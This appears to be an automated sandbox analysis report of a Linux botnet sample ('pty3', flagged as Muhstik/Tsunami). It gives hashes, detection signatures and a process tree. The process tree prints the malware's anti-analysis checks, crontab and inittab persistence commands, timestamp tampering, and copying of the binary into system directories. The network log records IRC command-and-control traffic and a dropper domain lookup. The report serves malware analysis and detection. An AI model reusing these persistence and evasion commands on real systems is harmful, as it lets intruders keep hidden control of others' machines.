
Linux Analysis Report pty3

Overview

General Information

Sample Name: pty3
Analysis ID: 543493
MD5: 12cedf7cd63208ee8fd9d0359637c46c
SHA1: 6c376c3a9d7811100e0c470fc3d4d05de06fb30b
SHA256: 4a719439027a279b14a05d650691bed6e0a437ae87fb55895406616a55c6c720
Tags: elf, log4j

Detection

Muhstik Tsunami
Score: 96
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Muhstik
Multi AV Scanner detection for submitted file
Yara detected Tsunami
Uses IRC for communication with a C&C
Writes identical ELF files to multiple locations
Sample tries to persist itself using cron
Explicitly modifies time stamps using the "touch" command
Executes the "crontab" command typically for achieving persistence
Uses known network protocols on non-standard ports
Sample contains only a LOAD segment without any section mappings
Writes ELF files to disk
Executes the "grep" command used to find patterns in files or piped streams
Uses the "uname" system call to query kernel version information (possible evasion)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Executes the "touch" command used to create files or modify time stamps

Analysis Advice

None of the HTTP servers contacted by the sample answer. The sample is likely an old dropper that no longer works.
None of the domains contacted by the sample resolve. The sample is likely an old dropper that no longer works.

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 543493
Start date: 21.12.2021
Start time: 15:41:22
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 29s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: pty3
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Detection: MAL
Classification: mal96.troj.evad.lin@0/23@8/0
Warnings:
  • VT rate limit hit for: /dev/shm/pty3

Process Tree

  • system is lnxubuntu20
  • pty3 (PID: 5228, Parent: 5118, MD5: 12cedf7cd63208ee8fd9d0359637c46c) Arguments: /tmp/pty3
    • pty3 New Fork (PID: 5229, Parent: 5228)
    • sh (PID: 5229, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof -x strace > /dev/null"
      • sh New Fork (PID: 5230, Parent: 5229)
      • pidof (PID: 5230, Parent: 5229, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof -x strace
    • pty3 New Fork (PID: 5232, Parent: 5228)
    • sh (PID: 5232, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof -x tcpdump > /dev/null"
      • sh New Fork (PID: 5233, Parent: 5232)
      • pidof (PID: 5233, Parent: 5232, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof -x tcpdump
    • pty3 New Fork (PID: 5236, Parent: 5228)
      • pty3 New Fork (PID: 5239, Parent: 5236)
      • sh (PID: 5239, Parent: 5236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -r"
        • sh New Fork (PID: 5245, Parent: 5239)
        • crontab (PID: 5245, Parent: 5239, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -r
    • pty3 New Fork (PID: 5237, Parent: 5228)
      • pty3 New Fork (PID: 5240, Parent: 5237)
      • sh (PID: 5240, Parent: 5237, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/pty3 > /dev/null 2>&1 &\") | crontab -"
        • sh New Fork (PID: 5242, Parent: 5240)
        • crontab (PID: 5242, Parent: 5240, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
        • sh New Fork (PID: 5244, Parent: 5240)
        • grep (PID: 5244, Parent: 5240, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /tmp/pty3
        • sh New Fork (PID: 5246, Parent: 5240)
        • grep (PID: 5246, Parent: 5240, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"
        • sh New Fork (PID: 5250, Parent: 5240)
          • sh New Fork (PID: 5252, Parent: 5250)
          • crontab (PID: 5252, Parent: 5250, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
        • sh New Fork (PID: 5251, Parent: 5240)
        • crontab (PID: 5251, Parent: 5240, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
    • pty3 New Fork (PID: 5238, Parent: 5228)
    • sh (PID: 5238, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/tmp/pty3\" > /etc/inittab2"
      • sh New Fork (PID: 5241, Parent: 5238)
      • cat (PID: 5241, Parent: 5238, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab
      • sh New Fork (PID: 5243, Parent: 5238)
      • grep (PID: 5243, Parent: 5238, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /tmp/pty3
    • pty3 New Fork (PID: 5249, Parent: 5228)
    • sh (PID: 5249, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/tmp/pty3\" >> /etc/inittab2"
    • pty3 New Fork (PID: 5253, Parent: 5228)
    • sh (PID: 5253, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
      • sh New Fork (PID: 5254, Parent: 5253)
      • cat (PID: 5254, Parent: 5253, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2
    • pty3 New Fork (PID: 5255, Parent: 5228)
    • sh (PID: 5255, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"
      • sh New Fork (PID: 5256, Parent: 5255)
      • rm (PID: 5256, Parent: 5255, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2
    • pty3 New Fork (PID: 5257, Parent: 5228)
    • sh (PID: 5257, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
      • sh New Fork (PID: 5258, Parent: 5257)
      • touch (PID: 5258, Parent: 5257, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab
    • pty3 New Fork (PID: 5259, Parent: 5228)
      • pty3 New Fork (PID: 5261, Parent: 5259)
      • sh (PID: 5261, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /dev/shm/pty3"
        • sh New Fork (PID: 5263, Parent: 5261)
        • cp (PID: 5263, Parent: 5261, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /dev/shm/pty3
      • pty3 New Fork (PID: 5265, Parent: 5259)
        • pty3 New Fork (PID: 5267, Parent: 5265)
        • sh (PID: 5267, Parent: 5265, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /dev/shm/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/pty3 > /dev/null 2>&1 &\") | crontab -"
          • sh New Fork (PID: 5268, Parent: 5267)
          • crontab (PID: 5268, Parent: 5267, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5269, Parent: 5267)
          • grep (PID: 5269, Parent: 5267, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /dev/shm/pty3
          • sh New Fork (PID: 5270, Parent: 5267)
          • grep (PID: 5270, Parent: 5267, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"
          • sh New Fork (PID: 5273, Parent: 5267)
            • sh New Fork (PID: 5275, Parent: 5273)
            • crontab (PID: 5275, Parent: 5273, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5274, Parent: 5267)
          • crontab (PID: 5274, Parent: 5267, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • pty3 New Fork (PID: 5266, Parent: 5259)
      • sh (PID: 5266, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/dev/shm/pty3\" > /etc/inittab2"
        • sh New Fork (PID: 5271, Parent: 5266)
        • cat (PID: 5271, Parent: 5266, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab
        • sh New Fork (PID: 5272, Parent: 5266)
        • grep (PID: 5272, Parent: 5266, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /dev/shm/pty3
      • pty3 New Fork (PID: 5276, Parent: 5259)
      • sh (PID: 5276, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/dev/shm/pty3\" >> /etc/inittab2"
      • pty3 New Fork (PID: 5277, Parent: 5259)
      • sh (PID: 5277, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 5278, Parent: 5277)
        • cat (PID: 5278, Parent: 5277, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2
      • pty3 New Fork (PID: 5279, Parent: 5259)
      • sh (PID: 5279, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 5280, Parent: 5279)
        • rm (PID: 5280, Parent: 5279, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2
      • pty3 New Fork (PID: 5281, Parent: 5259)
      • sh (PID: 5281, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 5282, Parent: 5281)
        • touch (PID: 5282, Parent: 5281, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab
      • pty3 New Fork (PID: 5283, Parent: 5259)
      • sh (PID: 5283, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /var/tmp/pty3"
        • sh New Fork (PID: 5284, Parent: 5283)
        • cp (PID: 5284, Parent: 5283, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /var/tmp/pty3
      • pty3 New Fork (PID: 5285, Parent: 5259)
        • pty3 New Fork (PID: 5287, Parent: 5285)
        • sh (PID: 5287, Parent: 5285, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/pty3 > /dev/null 2>&1 &\") | crontab -"
          • sh New Fork (PID: 5290, Parent: 5287)
          • crontab (PID: 5290, Parent: 5287, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5291, Parent: 5287)
          • grep (PID: 5291, Parent: 5287, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/tmp/pty3
          • sh New Fork (PID: 5292, Parent: 5287)
          • grep (PID: 5292, Parent: 5287, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"
          • sh New Fork (PID: 5294, Parent: 5287)
            • sh New Fork (PID: 5296, Parent: 5294)
            • crontab (PID: 5296, Parent: 5294, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5295, Parent: 5287)
          • crontab (PID: 5295, Parent: 5287, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • pty3 New Fork (PID: 5286, Parent: 5259)
      • sh (PID: 5286, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/tmp/pty3\" > /etc/inittab2"
        • sh New Fork (PID: 5288, Parent: 5286)
        • cat (PID: 5288, Parent: 5286, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab
        • sh New Fork (PID: 5289, Parent: 5286)
        • grep (PID: 5289, Parent: 5286, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/tmp/pty3
      • pty3 New Fork (PID: 5293, Parent: 5259)
      • sh (PID: 5293, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/tmp/pty3\" >> /etc/inittab2"
      • pty3 New Fork (PID: 5297, Parent: 5259)
      • sh (PID: 5297, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 5298, Parent: 5297)
        • cat (PID: 5298, Parent: 5297, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2
      • pty3 New Fork (PID: 5299, Parent: 5259)
      • sh (PID: 5299, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 5300, Parent: 5299)
        • rm (PID: 5300, Parent: 5299, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2
      • pty3 New Fork (PID: 5301, Parent: 5259)
      • sh (PID: 5301, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 5302, Parent: 5301)
        • touch (PID: 5302, Parent: 5301, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab
      • pty3 New Fork (PID: 5303, Parent: 5259)
      • sh (PID: 5303, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /var/lock/pty3"
        • sh New Fork (PID: 5304, Parent: 5303)
        • cp (PID: 5304, Parent: 5303, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /var/lock/pty3
      • pty3 New Fork (PID: 5305, Parent: 5259)
        • pty3 New Fork (PID: 5307, Parent: 5305)
        • sh (PID: 5307, Parent: 5305, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/lock/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/pty3 > /dev/null 2>&1 &\") | crontab -"
          • sh New Fork (PID: 5310, Parent: 5307)
          • crontab (PID: 5310, Parent: 5307, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5311, Parent: 5307)
          • grep (PID: 5311, Parent: 5307, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/lock/pty3
          • sh New Fork (PID: 5312, Parent: 5307)
          • grep (PID: 5312, Parent: 5307, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"
          • sh New Fork (PID: 5316, Parent: 5307)
            • sh New Fork (PID: 5318, Parent: 5316)
            • crontab (PID: 5318, Parent: 5316, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5317, Parent: 5307)
          • crontab (PID: 5317, Parent: 5307, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • pty3 New Fork (PID: 5306, Parent: 5259)
      • sh (PID: 5306, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/lock/pty3\" > /etc/inittab2"
        • sh New Fork (PID: 5308, Parent: 5306)
        • cat (PID: 5308, Parent: 5306, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab
        • sh New Fork (PID: 5309, Parent: 5306)
        • grep (PID: 5309, Parent: 5306, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/lock/pty3
      • pty3 New Fork (PID: 5315, Parent: 5259)
      • sh (PID: 5315, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/lock/pty3\" >> /etc/inittab2"
      • pty3 New Fork (PID: 5319, Parent: 5259)
      • sh (PID: 5319, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 5320, Parent: 5319)
        • cat (PID: 5320, Parent: 5319, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2
      • pty3 New Fork (PID: 5321, Parent: 5259)
      • sh (PID: 5321, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 5322, Parent: 5321)
        • rm (PID: 5322, Parent: 5321, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2
      • pty3 New Fork (PID: 5323, Parent: 5259)
      • sh (PID: 5323, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 5324, Parent: 5323)
        • touch (PID: 5324, Parent: 5323, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab
      • pty3 New Fork (PID: 5325, Parent: 5259)
      • sh (PID: 5325, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /var/run/pty3"
        • sh New Fork (PID: 5326, Parent: 5325)
        • cp (PID: 5326, Parent: 5325, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /var/run/pty3
      • pty3 New Fork (PID: 5327, Parent: 5259)
        • pty3 New Fork (PID: 5329, Parent: 5327)
        • sh (PID: 5329, Parent: 5327, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/run/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/pty3 > /dev/null 2>&1 &\") | crontab -"
          • sh New Fork (PID: 5332, Parent: 5329)
          • crontab (PID: 5332, Parent: 5329, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5333, Parent: 5329)
          • grep (PID: 5333, Parent: 5329, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/run/pty3
          • sh New Fork (PID: 5334, Parent: 5329)
          • grep (PID: 5334, Parent: 5329, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"
          • sh New Fork (PID: 5336, Parent: 5329)
            • sh New Fork (PID: 5338, Parent: 5336)
            • crontab (PID: 5338, Parent: 5336, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5337, Parent: 5329)
          • crontab (PID: 5337, Parent: 5329, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • pty3 New Fork (PID: 5328, Parent: 5259)
      • sh (PID: 5328, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/run/pty3\" > /etc/inittab2"
        • sh New Fork (PID: 5330, Parent: 5328)
        • cat (PID: 5330, Parent: 5328, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab
        • sh New Fork (PID: 5331, Parent: 5328)
        • grep (PID: 5331, Parent: 5328, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/run/pty3
      • pty3 New Fork (PID: 5335, Parent: 5259)
      • sh (PID: 5335, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/run/pty3\" >> /etc/inittab2"
      • pty3 New Fork (PID: 5339, Parent: 5259)
      • sh (PID: 5339, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 5340, Parent: 5339)
        • cat (PID: 5340, Parent: 5339, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2
      • pty3 New Fork (PID: 5341, Parent: 5259)
      • sh (PID: 5341, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 5342, Parent: 5341)
        • rm (PID: 5342, Parent: 5341, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2
      • pty3 New Fork (PID: 5343, Parent: 5259)
      • sh (PID: 5343, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 5344, Parent: 5343)
        • touch (PID: 5344, Parent: 5343, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab
    • pty3 New Fork (PID: 5260, Parent: 5228)
      • pty3 New Fork (PID: 5262, Parent: 5260)
      • sh (PID: 5262, Parent: 5260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/uname -n"
        • sh New Fork (PID: 5264, Parent: 5262)
        • uname (PID: 5264, Parent: 5262, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: /bin/uname -n
  • cleanup

Yara Overview

Memory Dumps

Source                                             Rule                  Description             Author        Strings
5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp  JoeSecurity_Tsunami   Yara detected Tsunami   Joe Security
5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp  JoeSecurity_Muhstik   Yara detected Muhstik   Joe Security
5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp  JoeSecurity_Tsunami   Yara detected Tsunami   Joe Security
5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp  JoeSecurity_Muhstik   Yara detected Muhstik   Joe Security
5237.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp  JoeSecurity_Tsunami   Yara detected Tsunami   Joe Security
(table truncated: the full report lists 19 entries)

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: pty3 | Virustotal: Detection: 51%
Source: pty3 | Metadefender: Detection: 32%
Source: pty3 | ReversingLabs: Detection: 51%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2034743 ET TROJAN ELF/Muhstik Botnet CnC Activity 192.168.2.23:35994 -> 144.172.71.180:8080
Uses IRC for communication with a C&C
Source: unknown | IRC traffic detected: 192.168.2.23:35994 -> 144.172.71.180:8080 NICK x86|LOG|i|0|6234378|galassia USER x01 localhost localhost :muhstik-11052018
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: IRC traffic on port 35994 -> 8080 (2 identical entries)
Source: global traffic | TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic | TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic | TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic | TCP traffic: 192.168.2.23:35994 -> 144.172.71.180:8080
Source: /tmp/pty3 (PID: 5228) | Socket: 127.0.0.1::59000
Source: unknown | DNS traffic detected: query: l.deutschland-zahlung.net replaycode: Name error (3)
Source: unknown | Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown | TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown | TCP traffic detected without corresponding DNS query: 144.172.71.180 (9 identical entries)
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown | TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (8 identical entries)
Source: unknown | DNS traffic detected: queries for: l.deutschland-zahlung.net
Source: LOAD without section mappings | Program segment: 0x100000
Source: classification engine | Classification label: mal96.troj.evad.lin@0/23@8/0

Persistence and Installation Behavior:

Writes identical ELF files to multiple locations
Source: /usr/bin/cp (PID: 5304) | File with SHA-256 4A719439027A279B14A05D650691BED6E0A437AE87FB55895406616A55C6C720 written: /run/lock/pty3
Source: /usr/bin/cp (PID: 5263) | File with SHA-256 4A719439027A279B14A05D650691BED6E0A437AE87FB55895406616A55C6C720 written: /dev/shm/pty3
Source: /usr/bin/cp (PID: 5284) | File with SHA-256 4A719439027A279B14A05D650691BED6E0A437AE87FB55895406616A55C6C720 written: /var/tmp/pty3
Source: /usr/bin/cp (PID: 5326) | File with SHA-256 4A719439027A279B14A05D650691BED6E0A437AE87FB55895406616A55C6C720 written: /run/pty3
Sample tries to persist itself using cron
Source: /usr/bin/crontab (PID: 5251) | File: /var/spool/cron/crontabs/tmp.l3d2Df
Source: /usr/bin/crontab (PID: 5251) | File: /var/spool/cron/crontabs/root
Source: /usr/bin/crontab (PID: 5274) | File: /var/spool/cron/crontabs/tmp.OnJidY
Source: /usr/bin/crontab (PID: 5274) | File: /var/spool/cron/crontabs/root
Source: /usr/bin/crontab (PID: 5295) | File: /var/spool/cron/crontabs/tmp.u6tmyy
Source: /usr/bin/crontab (PID: 5295) | File: /var/spool/cron/crontabs/root
Source: /usr/bin/crontab (PID: 5317) | File: /var/spool/cron/crontabs/tmp.pRPXld
Source: /usr/bin/crontab (PID: 5317) | File: /var/spool/cron/crontabs/root
Source: /usr/bin/crontab (PID: 5337) | File: /var/spool/cron/crontabs/tmp.qQwB9I
Source: /usr/bin/crontab (PID: 5337) | File: /var/spool/cron/crontabs/root
Explicitly modifies time stamps using the "touch" command
Source: /bin/sh (PID: 5258) | Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab
Source: /bin/sh (PID: 5282) | Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab
Source: /bin/sh (PID: 5302) | Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab
Source: /bin/sh (PID: 5324) | Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab
Source: /bin/sh (PID: 5344) | Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab
Executes the "crontab" command typically for achieving persistence
Source: /bin/sh (PID: 5245) | Crontab executable: /usr/bin/crontab -> crontab -r
Source: /bin/sh (PID: 5242) | Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 5252) | Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 5251) | Crontab executable: /usr/bin/crontab -> crontab -
Source: /bin/sh (PID: 5268) | Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 5275) | Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 5274) | Crontab executable: /usr/bin/crontab -> crontab -
Source: /bin/sh (PID: 5290) | Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 5296) | Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 5295) | Crontab executable: /usr/bin/crontab -> crontab -
Source: /bin/sh (PID: 5310) | Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 5318) | Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 5317) | Crontab executable: /usr/bin/crontab -> crontab -
Source: /bin/sh (PID: 5332) | Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 5338) | Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 5337) | Crontab executable: /usr/bin/crontab -> crontab -
Source: /usr/bin/cp (PID: 5263) | File written: /dev/shm/pty3
Source: /usr/bin/cp (PID: 5284) | File written: /var/tmp/pty3
Source: /usr/bin/cp (PID: 5304) | File written: /run/lock/pty3
Source: /usr/bin/cp (PID: 5326) | File written: /run/pty3
Source: /bin/sh (PID: 5244) | Grep executable: /usr/bin/grep -> grep /tmp/pty3
Source: /bin/sh (PID: 5246) | Grep executable: /usr/bin/grep -> grep -v "no cron"
Source: /bin/sh (PID: 5243) | Grep executable: /usr/bin/grep -> grep -v /tmp/pty3
Source: /bin/sh (PID: 5269) | Grep executable: /usr/bin/grep -> grep /dev/shm/pty3
Source: /bin/sh (PID: 5270) | Grep executable: /usr/bin/grep -> grep -v "no cron"
Source: /bin/sh (PID: 5272) | Grep executable: /usr/bin/grep -> grep -v /dev/shm/pty3
Source: /bin/sh (PID: 5291) | Grep executable: /usr/bin/grep -> grep /var/tmp/pty3
Source: /bin/sh (PID: 5292) | Grep executable: /usr/bin/grep -> grep -v "no cron"
Source: /bin/sh (PID: 5289) | Grep executable: /usr/bin/grep -> grep -v /var/tmp/pty3
Source: /bin/sh (PID: 5311) | Grep executable: /usr/bin/grep -> grep /var/lock/pty3
